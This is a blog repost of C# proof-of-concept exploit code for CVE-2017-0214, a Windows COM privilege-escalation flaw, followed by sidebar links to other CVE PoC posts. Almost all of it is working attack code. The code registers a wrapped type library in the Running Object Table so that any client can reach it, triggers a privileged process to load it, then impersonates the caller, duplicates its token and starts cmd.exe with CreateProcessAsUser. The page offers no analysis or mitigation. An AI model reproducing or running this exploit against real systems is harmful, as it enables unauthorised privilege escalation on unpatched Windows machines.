CVE-2017-0214Poc
来源:互联网 发布:电脑音频剪辑软件 编辑:程序博客网 时间:2024/05/21 11:24
using Microsoft.Win32.SafeHandles;using MSSITLB;using System;using System.Diagnostics;using System.IO;using System.Reflection;using System.Runtime.ConstrainedExecution;using System.Runtime.InteropServices;using System.Runtime.InteropServices.ComTypes;using System.Runtime.Versioning;using System.Security;using System.Security.Permissions;using System.Security.Principal;using System.Text;using IS = System.Runtime.InteropServices;namespace PoC_RotRegistrationEoP{ static class Utils { [IS.DllImport("rpcrt4.dll")] static extern int I_RpcBindingInqLocalClientPID(IntPtr ClientBinding, out int ClientPID); public static int GetRpcPid() { int pid; if (I_RpcBindingInqLocalClientPID(IntPtr.Zero, out pid) == 0) { return pid; } return -1; } } [IS.ComVisible(true)] class TypeInfoWrapper : ITypeInfo2, ITypeInfo { private ITypeInfo2 _type_info; public TypeInfoWrapper(ITypeInfo2 type_info) { _type_info = type_info; } public TypeInfoWrapper(ITypeInfo type_info) : this((ITypeInfo2)type_info) { } public void AddressOfMember(int memid, System.Runtime.InteropServices.ComTypes.INVOKEKIND invKind, out IntPtr ppv) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _type_info.AddressOfMember(memid, invKind, out ppv); } public void CreateInstance(object pUnkOuter, ref Guid riid, out object ppvObj) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _type_info.CreateInstance(pUnkOuter, ref riid, out ppvObj); } public void GetAllCustData(IntPtr pCustData) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _type_info.GetAllCustData(pCustData); } public void GetAllFuncCustData(int index, IntPtr pCustData) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _type_info.GetAllFuncCustData(index, pCustData); } public void GetAllImplTypeCustData(int index, IntPtr pCustData) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _type_info.GetAllImplTypeCustData(index, pCustData); } public void GetAllParamCustData(int indexFunc, int indexParam, IntPtr pCustData) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _type_info.GetAllParamCustData(indexFunc, indexParam, pCustData); } public void GetAllVarCustData(int index, IntPtr pCustData) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _type_info.GetAllVarCustData(index, pCustData); } public void GetContainingTypeLib(out ITypeLib ppTLB, out int pIndex) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); ITypeLib type_lib; _type_info.GetContainingTypeLib(out type_lib, out pIndex); ppTLB = new TypeLibWrapper(type_lib); } public void GetCustData(ref Guid guid, out object pVarVal) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _type_info.GetCustData(ref guid, out pVarVal); } public void GetDllEntry(int memid, System.Runtime.InteropServices.ComTypes.INVOKEKIND invKind, IntPtr pBstrDllName, IntPtr pBstrName, IntPtr pwOrdinal) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _type_info.GetDllEntry(memid, invKind, pBstrDllName, pBstrName, pwOrdinal); } public void GetDocumentation(int index, out string strName, out string strDocString, out int dwHelpContext, out string strHelpFile) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _type_info.GetDocumentation(index, out strName, out strDocString, out dwHelpContext, out strHelpFile); } public void GetDocumentation2(int memid, out string pbstrHelpString, out int pdwHelpStringContext, out string pbstrHelpStringDll) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _type_info.GetDocumentation2(memid, out pbstrHelpString, out pdwHelpStringContext, out pbstrHelpStringDll); } public void GetFuncCustData(int index, ref Guid guid, out object pVarVal) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _type_info.GetFuncCustData(index, ref guid, out pVarVal); } public void GetFuncDesc(int index, out IntPtr ppFuncDesc) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _type_info.GetFuncDesc(index, out ppFuncDesc); } public void GetFuncIndexOfMemId(int memid, System.Runtime.InteropServices.ComTypes.INVOKEKIND invKind, out int pFuncIndex) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _type_info.GetFuncIndexOfMemId(memid, invKind, out pFuncIndex); } public void GetIDsOfNames(string[] rgszNames, int cNames, int[] pMemId) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _type_info.GetIDsOfNames(rgszNames, cNames, pMemId); } public void GetImplTypeCustData(int index, ref Guid guid, out object pVarVal) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _type_info.GetImplTypeCustData(index, ref guid, out pVarVal); } public void GetImplTypeFlags(int index, out System.Runtime.InteropServices.ComTypes.IMPLTYPEFLAGS pImplTypeFlags) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _type_info.GetImplTypeFlags(index, out pImplTypeFlags); } public void GetMops(int memid, out string pBstrMops) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _type_info.GetMops(memid, out pBstrMops); } public void GetNames(int memid, string[] rgBstrNames, int cMaxNames, out int pcNames) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _type_info.GetNames(memid, rgBstrNames, cMaxNames, out pcNames); } public void GetParamCustData(int indexFunc, int indexParam, ref Guid guid, out object pVarVal) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _type_info.GetParamCustData(indexFunc, indexParam, ref guid, out pVarVal); } public void GetRefTypeInfo(int hRef, out ITypeInfo ppTI) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); ITypeInfo type_info; _type_info.GetRefTypeInfo(hRef, out type_info); ppTI = new TypeInfoWrapper(type_info); } public void GetRefTypeOfImplType(int index, out int href) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _type_info.GetRefTypeOfImplType(index, out href); } public void GetTypeAttr(out IntPtr ppTypeAttr) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _type_info.GetTypeAttr(out ppTypeAttr); } public void GetTypeComp(out ITypeComp ppTComp) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _type_info.GetTypeComp(out ppTComp); } public void GetTypeFlags(out int pTypeFlags) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _type_info.GetTypeFlags(out pTypeFlags); } public void GetTypeKind(out System.Runtime.InteropServices.ComTypes.TYPEKIND pTypeKind) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _type_info.GetTypeKind(out pTypeKind); } public void GetVarCustData(int index, ref Guid guid, out object pVarVal) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _type_info.GetVarCustData(index, ref guid, out pVarVal); } public void GetVarDesc(int index, out IntPtr ppVarDesc) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _type_info.GetVarDesc(index, out ppVarDesc); } public void GetVarIndexOfMemId(int memid, out int pVarIndex) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _type_info.GetVarIndexOfMemId(memid, out pVarIndex); } public void Invoke(object pvInstance, int memid, short wFlags, ref System.Runtime.InteropServices.ComTypes.DISPPARAMS pDispParams, IntPtr pVarResult, IntPtr pExcepInfo, out int puArgErr) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _type_info.Invoke(pvInstance, memid, wFlags, ref pDispParams, pVarResult, pExcepInfo, out puArgErr); } public void ReleaseFuncDesc(IntPtr pFuncDesc) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _type_info.ReleaseFuncDesc(pFuncDesc); } public void ReleaseTypeAttr(IntPtr pTypeAttr) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _type_info.ReleaseTypeAttr(pTypeAttr); } public void ReleaseVarDesc(IntPtr pVarDesc) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _type_info.ReleaseVarDesc(pVarDesc); } } [StructLayout(LayoutKind.Sequential)] internal class PROCESS_INFORMATION { // The handles in PROCESS_INFORMATION are initialized in unmanaged functions. // We can't use SafeHandle here because Interop doesn't support [out] SafeHandles in structures/classes yet. public IntPtr hProcess = IntPtr.Zero; public IntPtr hThread = IntPtr.Zero; public int dwProcessId = 0; public int dwThreadId = 0; // Note this class makes no attempt to free the handles // Use InitialSetHandle to copy to handles into SafeHandles } [IS.ComVisible(true)] class TypeLibWrapper : ITypeLib2, ITypeLib { [DllImport("ole32.dll", ExactSpelling = true, PreserveSig = false)] [return: MarshalAs(UnmanagedType.Interface)] static extern object CoGetCallContext([In, MarshalAs(UnmanagedType.LPStruct)] Guid riid); Guid gd=new Guid("{0000013E-0000-0000-C000-000000000046}"); private ITypeLib2 _tlb; public TypeLibWrapper(ITypeLib2 tlb) { _tlb = tlb; } public TypeLibWrapper(ITypeLib tlb) : this((ITypeLib2)tlb) { } [IS.DllImport("oleaut32.dll", CharSet = IS.CharSet.Unicode, PreserveSig = false)] static extern ITypeLib LoadTypeLib(string strTypeLibName); public TypeLibWrapper(string typelibname) { try { _tlb = (ITypeLib2)LoadTypeLib(typelibname); int a = 0; } catch (Exception) { throw; } } public void FindName(string szNameBuf, int lHashVal, ITypeInfo[] ppTInfo, int[] rgMemId, ref short pcFound) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _tlb.FindName(szNameBuf, lHashVal, ppTInfo, rgMemId, ref pcFound); } public void GetAllCustData(IntPtr pCustData) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _tlb.GetAllCustData(pCustData); } public void GetCustData(ref Guid guid, out object pVarVal) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _tlb.GetCustData(ref guid, out pVarVal); } public void GetDocumentation(int index, out string strName, out string strDocString, out int dwHelpContext, out string strHelpFile) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _tlb.GetDocumentation(index, out strName, out strDocString, out dwHelpContext, out strHelpFile); } public void GetDocumentation2(int index, out string pbstrHelpString, out int pdwHelpStringContext, out string pbstrHelpStringDll) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _tlb.GetDocumentation2(index, out pbstrHelpString, out pdwHelpStringContext, out pbstrHelpStringDll); } internal const String ADVAPI32 = "advapi32.dll"; internal const String KERNEL32 = "kernel32.dll"; [DllImport(ADVAPI32, SetLastError = true, EntryPoint = "OpenThreadToken")] [ResourceExposure(ResourceScope.None)] internal static extern bool OpenCurrentThreadToken( [In] IntPtr ThreadHandle, [In] TokenAccessLevels DesiredAccess, [In] bool OpenAsSelf, [Out] out IntPtr TokenHandle); [DllImport(KERNEL32, SetLastError = true)] [ResourceExposure(ResourceScope.None)] internal static extern IntPtr GetCurrentThread(); internal enum SECURITY_IMPERSONATION_LEVEL { Anonymous = 0, Identification = 1, Impersonation = 2, Delegation = 3, } [Serializable] internal enum TokenTypeVal : int { TokenPrimary = 1, TokenImpersonation } [ReliabilityContract(Consistency.WillNotCorruptState, Cer.MayFail)] [DllImport(ADVAPI32, CharSet = CharSet.Auto, SetLastError = true)] [ResourceExposure(ResourceScope.None)] internal static extern bool DuplicateTokenEx( [In] IntPtr ExistingTokenHandle, [In] TokenAccessLevels DesiredAccess, [In] IntPtr TokenAttributes, [In] SECURITY_IMPERSONATION_LEVEL ImpersonationLevel, [In] TokenTypeVal TokenType, [In, Out] ref IntPtr DuplicateTokenHandle); [DllImport(ADVAPI32, CharSet = System.Runtime.InteropServices.CharSet.Auto, SetLastError = true, BestFitMapping = false)] [System.Security.SuppressUnmanagedCodeSecurityAttribute()] [ResourceExposure(ResourceScope.Machine)] public extern static bool CreateProcessAsUser(IntPtr hToken, String lpApplicationName, String lpCommandLine, ref SecurityAttributes lpProcessAttributes, ref SecurityAttributes lpThreadAttributes, bool bInheritHandle, int dwCreationFlags, IntPtr lpEnvironment, String lpCurrentDirectory, ref StartupInfo lpStartupInfo, out ProcessInformation lpProcessInformation); [StructLayout(LayoutKind.Sequential)] public struct StartupInfo { public int cb; public String lpReserved; public String lpDesktop; public String lpTitle; public uint dwX; public uint dwY; public uint dwXSize; public uint dwYSize; public uint dwXCountChars; public uint dwYCountChars; public uint dwFillAttribute; public uint dwFlags; public short wShowWindow; public short cbReserved2; public IntPtr lpReserved2; public IntPtr hStdInput; public IntPtr hStdOutput; public IntPtr hStdError; } [StructLayout(LayoutKind.Sequential)] public struct ProcessInformation { public IntPtr hProcess; public IntPtr hThread; public uint dwProcessId; public uint dwThreadId; } [StructLayout(LayoutKind.Sequential)] public struct SecurityAttributes { public int Length; public IntPtr lpSecurityDescriptor; public bool bInheritHandle; } [DllImport("ole32.dll")] static extern int CoQueryClientBlanket(out IntPtr pAuthnSvc, out IntPtr pAuthzSvc, [MarshalAs(UnmanagedType.LPWStr)] out StringBuilder pServerPrincName, out IntPtr pAuthnLevel, out IntPtr pImpLevel, out IntPtr pPrivs, out IntPtr pCapabilities); public void GetLibAttr(out IntPtr ppTLibAttr) { System.Diagnostics.Process.Start(@"C:\Windows\System32\cmd.exe"); Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); Console.WriteLine("firstShoot"); IntPtr threadPtr1=IntPtr.Zero; IntPtr threadPtr23=IntPtr.Zero; IntPtr threadPtr3=IntPtr.Zero; IntPtr threadPtr4=IntPtr.Zero; IntPtr threadPtr5=IntPtr.Zero; IntPtr threadPtr6=IntPtr.Zero; StringBuilder sb = new StringBuilder(); CoQueryClientBlanket(out threadPtr1, out threadPtr23,out sb, out threadPtr3, out threadPtr4, out threadPtr5, out threadPtr6); string s = sb.ToString(); IntPtr tokenHandle = IntPtr.Zero; IntPtr threadPtr = GetCurrentThread(); bool isSuccess = OpenCurrentThreadToken(threadPtr, TokenAccessLevels.Query, true, out tokenHandle); Console.WriteLine("threadPtr1is:" + tokenHandle); IServerSecurity pss = CoGetCallContext(gd) as IServerSecurity; int a = pss.ImpersonateClient(); IntPtr tokenHandle2 = IntPtr.Zero; IntPtr threadPtr2 = GetCurrentThread(); isSuccess = OpenCurrentThreadToken(threadPtr2, TokenAccessLevels.Query, true, out tokenHandle2); Console.WriteLine("threadPtr2is:" + tokenHandle2); IntPtr hToken2 = IntPtr.Zero; var sa = new SecurityAttributes { bInheritHandle = false }; sa.Length = Marshal.SizeOf(sa); isSuccess = DuplicateTokenEx(tokenHandle2, TokenAccessLevels.MaximumAllowed, IntPtr.Zero, SECURITY_IMPERSONATION_LEVEL.Identification, TokenTypeVal.TokenPrimary, ref hToken2); Console.WriteLine("DuplicateTokenEx:" + tokenHandle + "err:" + Marshal.GetLastWin32Error()); sa.lpSecurityDescriptor = (IntPtr)0; var si = new StartupInfo();si.cb = Marshal.SizeOf(si);si.lpDesktop = "";// ReSharper disable once RedundantAssignmentvar pi = new ProcessInformation(); isSuccess = CreateProcessAsUser(tokenHandle2, "cmd.exe", @"C:\Windows\System32\cmd.exe", ref sa, ref sa, false, 0, (IntPtr)0, "C:\\", ref si, out pi); Console.WriteLine("CreateProcessAsUser:" + isSuccess); //IntPtr pwz = IntPtr.Zero; //IntPtr pwz2 = IntPtr.Zero; //pss.QueryBlanket(IntPtr.Zero, IntPtr.Zero, pwz, IntPtr.Zero, IntPtr.Zero, pwz2, IntPtr.Zero); //string s = Marshal.PtrToStringAuto(pwz); //string s2 = Marshal.PtrToStringAuto(pwz2); //System.Diagnostics.Process p = new System.Diagnostics.Process(); //p.StartInfo.FileName = @"cmd.exe"; //p.StartInfo.WindowStyle = ProcessWindowStyle.Normal; //p.Start();//启动程序 //p.WaitForExit(); _tlb.GetLibAttr(out ppTLibAttr); return; } public void GetLibStatistics(IntPtr pcUniqueNames, out int pcchUniqueNames) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _tlb.GetLibStatistics(pcUniqueNames, out pcchUniqueNames); } public void GetTypeComp(out ITypeComp ppTComp) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _tlb.GetTypeComp(out ppTComp); } public void GetTypeInfo(int index, out ITypeInfo ppTI) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); ITypeInfo type_info; _tlb.GetTypeInfo(index, out type_info); ppTI = new TypeInfoWrapper(type_info); } public int GetTypeInfoCount() { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); return _tlb.GetTypeInfoCount(); } public void GetTypeInfoOfGuid(ref Guid guid, out ITypeInfo ppTInfo) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); ITypeInfo type_info; _tlb.GetTypeInfoOfGuid(ref guid, out type_info); ppTInfo = new TypeInfoWrapper(type_info); } public void GetTypeInfoType(int index, out System.Runtime.InteropServices.ComTypes.TYPEKIND pTKind) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _tlb.GetTypeInfoType(index, out pTKind); } public bool IsName(string szNameBuf, int lHashVal) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); return _tlb.IsName(szNameBuf, lHashVal); } public void ReleaseTLibAttr(IntPtr pTLibAttr) { Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name); _tlb.ReleaseTLibAttr(pTLibAttr); } } [ComImport] [Guid("26D6311A-A724-4C8C-B83A-2E60ECD47480")] public class mytestcom { } [ComImport] [Guid("E80A6EC1-39FB-462A-A56C-411EE9FC1AEB")] public interface Imytestcom { void mdtest(); } [ComImport, Guid("0000013E-0000-0000-C000-000000000046"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)] internal interface IServerSecurity { void QueryBlanket ( IntPtr authnSvc, IntPtr authzSvc, IntPtr serverPrincipalName, IntPtr authnLevel, IntPtr impLevel, IntPtr clientPrincipalName, IntPtr Capabilities ); [PreserveSig] int ImpersonateClient(); [PreserveSig] int RevertToSelf(); [PreserveSig] [return: MarshalAs(UnmanagedType.Bool)] bool IsImpersonating(); } class Program { const String OLEAUT32 = "oleaut32.dll"; [DllImport(OLEAUT32, ExactSpelling = true, CharSet = CharSet.Unicode, PreserveSig = true)] [ResourceExposure(ResourceScope.None)] internal static extern int LoadRegTypeLib(ref Guid rguid, ushort major, ushort minor, int lcid, [MarshalAs(UnmanagedType.Interface)] out object typeLib); const int RPC_C_AUTHN_LEVEL_DEFAULT = 0; const int RPC_C_IMP_LEVEL_IMPERSONATE = 3; const int EOAC_APPID = 8; [IS.DllImport("ole32.dll")] static extern int CoInitializeSecurity( ref Guid pSecDesc, int cAuthSvc, IntPtr asAuthSvc, IntPtr pReserved1, int dwAuthnLevel, int dwImpLevel, IntPtr pAuthList, int dwCapabilities, IntPtr pReserved3 ); [return: IS.MarshalAs(IS.UnmanagedType.Interface)] [IS.DllImport("ole32.dll", CharSet = IS.CharSet.Unicode, ExactSpelling = true, PreserveSig = false)] static extern IMoniker CreateFileMoniker(string lpszPathName); [return: IS.MarshalAs(IS.UnmanagedType.Interface)] [IS.DllImport("ole32.dll", CharSet = IS.CharSet.Unicode, ExactSpelling = true, PreserveSig = false)] static extern IRunningObjectTable GetRunningObjectTable(int reserved); const int ROTFLAGS_ALLOWANYCLIENT = 2; const int ROTFLAGS_REGISTRATIONKEEPSALIVE = 1; static Guid tapi3guid = new Guid("{21D6D480-A88B-11D0-83DD-00AA003CCABD}"); [MTAThread] static void Main(string[] args) { try { // (new mytestcom() as Imytestcom).mdtest(); //byte[] bs = File.ReadAllBytes(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.System), "tapi3.dll")); // File.WriteAllBytes("c:\\123\\1.raw",bs); if (args.Length < 1) { Console.WriteLine("Usage: fake_typelib|-x"); return; } if (args[0] == "-x") { //Console.WriteLine("Running PoC"); //Type t = Type.GetTypeFromCLSID(new Guid("9E175B68-F52A-11D8-B9A5-505054503030")); //IGatherManagerAdmin2 mgr = (IGatherManagerAdmin2)Activator.CreateInstance(t); //mgr.GetBackoffReason(0x12345678); Type t = Type.GetTypeFromCLSID(new Guid("26D6311A-A724-4C8C-B83A-2E60ECD47480")); Activator.CreateInstance(t); // (new mytestcom() as Imytestcom).mdtest(); } else { //modified vervion string tlb_path = "C:\\project\\testalt\\Debug\\testalt.dll"; // string tlb_path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.System), "tapi3.dll"); // Guid appid = new Guid("{4584EA27-6431-483D-8653-F96796E1A051}"); // Guid appid = tapi3guid; //new gen guid // Guid appid = new Guid("{4584EA27-6431-483D-8653-F96796E1A051}"); Guid appid = new Guid("{3E5F704C-C0ED-491C-9BB5-EA1EAD8B31B7}"); //old // Guid appid = new Guid("{d056ebce-e7e9-4994-a5e6-de59430306c1}"); // int hr = CoInitializeSecurity(ref appid, -1, IntPtr.Zero, IntPtr.Zero, RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, IntPtr.Zero, EOAC_APPID, IntPtr.Zero); if (hr != 0) { IS.Marshal.ThrowExceptionForHR(hr); } TypeLibWrapper tlb = new TypeLibWrapper("C:\\123\\sys\\testalt.dll"); IMoniker moniker = CreateFileMoniker(tlb_path); IRunningObjectTable rot = GetRunningObjectTable(0); int flags = ROTFLAGS_ALLOWANYCLIENT | ROTFLAGS_REGISTRATIONKEEPSALIVE; // int flags = 0; int cookie = rot.Register(flags, tlb, moniker); byte[] bts = new byte[4096]; /// (new mytestcom() as Imytestcom).mdtest(); Console.ReadKey(); using (FileStream stm = new FileStream(tlb_path, FileMode.Open, FileAccess.Read, FileShare.Read | FileShare.Delete)) { stm.Lock(0, 4096); Console.WriteLine("Waiting"); // Guid g = new Guid("{21D6D48E-A88B-11D0-83DD-00AA003CCABD}"); //frompoc Guid g = new Guid("{9E175B68-F52A-11D8-B9A5-505054503030}"); object tpLib; // int b= LoadRegTypeLib(ref tapi3guid, 1, 0, 0, out tpLib); while (stm.Read(bts, 0, 4096) > 0) { //Type t = Type.GetTypeFromCLSID(g); //Activator.CreateInstance(t); Process ps = Process.Start(Process.GetCurrentProcess().MainModule.FileName, "-x"); ps.WaitForExit(); Console.ReadKey(); Console.WriteLine("Exited"); } Console.ReadKey(); } rot.Revoke(cookie); } } catch (Exception ex) { Console.WriteLine(ex); } Console.ReadKey(); } }}阅读全文
0 0
- CVE-2017-0214Poc
- CVE-2017-8464 转载poc
- CVE-2014-0243 POC
- CVE-2014-0246 POC
- CVE-2013-0191 PoC
- BlueBorne远程代码执行漏洞Poc实战(CVE-2017-0781)
- CVE-2014-0199 CVE-2014-0200 CVE-2014-0201 POC
- 使用Docker搭建Nginx整数溢出漏洞(CVE-2017-7529)及Python PoC验证
- Microsoft Edge 浏览器远程代码执行漏洞POC及细节(CVE-2017-8641)
- Microsoft Edge 浏览器远程代码执行漏洞POC及细节(CVE-2017-8641)
- Office远程代码执行漏洞POC样本分析(CVE-2017-11882)
- reliable CVE-2010-0806 poc & HIT2010
- CVE-2013-1488 分析和PoC
- CVE-2017-0214
- Samba漏洞(CVE-2015-0240)poc分析
- PoC
- PoC
- POC
- iOS 开发技术栈与进阶
- Python标准库05 存储对象 (pickle包,cPickle包)
- 串口通信的基本知识
- 手写AOP
- SSM(1)ajax的入门使用
- CVE-2017-0214Poc
- POJ 2745 显示器
- Python入门 第五天(装饰器、偏函数)
- Poj 2182 Lost Cows 线段树
- Cookie和Session机制
- C#1.数组里有{1,2,3,4,5,6,7,8,9,10},在一个 新数组中进行随机打乱顺序。
- 第5章 输入/输出
- github 快速实现多人协作
- 转载-教你彻底学会动态规划——入门篇
